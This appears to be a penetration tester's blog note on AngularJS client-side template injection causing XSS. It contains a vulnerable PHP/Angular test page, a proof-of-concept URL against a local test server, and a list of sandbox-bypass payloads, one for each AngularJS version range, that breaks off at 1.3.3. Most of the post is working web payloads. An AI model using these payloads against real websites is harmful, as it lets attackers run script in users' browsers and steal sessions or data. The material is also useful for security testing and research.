Tag:angularjs

Tag (angularjs)'s result:

client side template injection with angulajs cause xss

I often meet angulajs when I test website,so I want to make a note. <html ng-app> <head> <script src=”./angular.js”></script> </head> <body> <p> <?php $q = $_GET[‘q’];   //echo $q;   echo htmlspecialchars($q, ENT_QUOTES); ?> </p> </body> </html>   POC {{$id}} or {{1+1}} POC: http://127.0.0.1:8999/lsawebtest/vulenv/misc/angular-xss/test.php?q={{%27a%27.constructor.prototype.charAt=[].join;$eval(%27x=1}%20}%20};alert(0)//%27);}} //If you are interested in it,you can research how to bypass the sandbox.   Tow cases: https://www.freebuf.com/vuls/125932.html http://www.secevery.com:4321/bugs/wooyun-2016-0190247   List of Sandbox bypasses from portswigger 1.0.1 – 1.1.5 Mario Heiderich (Cure53) {{constructor.constructor(‘alert(1)’)()}}   1.2.0 – 1.2.1 Jan Horn (Google) {{a=’constructor’;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,’alert(1)’)()}}   1.2.2 – 1.2.5 Gareth Heyes (PortSwigger) {{‘a'[{toString:[].join,length:1,0:’__proto__’}].charAt=”.valueOf;$eval(“x=’”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+”‘”);}}   1.2.6 – 1.2.18 Jan Horn (Google) {{(_=”.sub).call.call({}[$=’constructor’].getOwnPropertyDescriptor(_.__proto__,$).value,0,’alert(1)’)()}}   1.2.19 – 1.2.23 Mathias Karlsson {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor);}}   1.2.24 – 1.2.29 Gareth Heyes (PortSwigger) {{‘a’.constructor.prototype.charAt=”.valueOf;$eval(“x=’\”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+\”‘”);}}   1.3.0 Gábor Molnár (Google) {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (”+”.toString( ‘F = Function.prototype;’ + ‘F.apply = F.a;’ + ‘delete F.a;’ + ‘delete F.valueOf;’ + ‘alert(1);’ )) );}}   1.3.1 – 1.3.2 Gareth Heyes (PortSwigger) {{ {}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=”.valueOf; $eval(‘x=alert(1)//’); }}   1.3.3 – 1.3.18……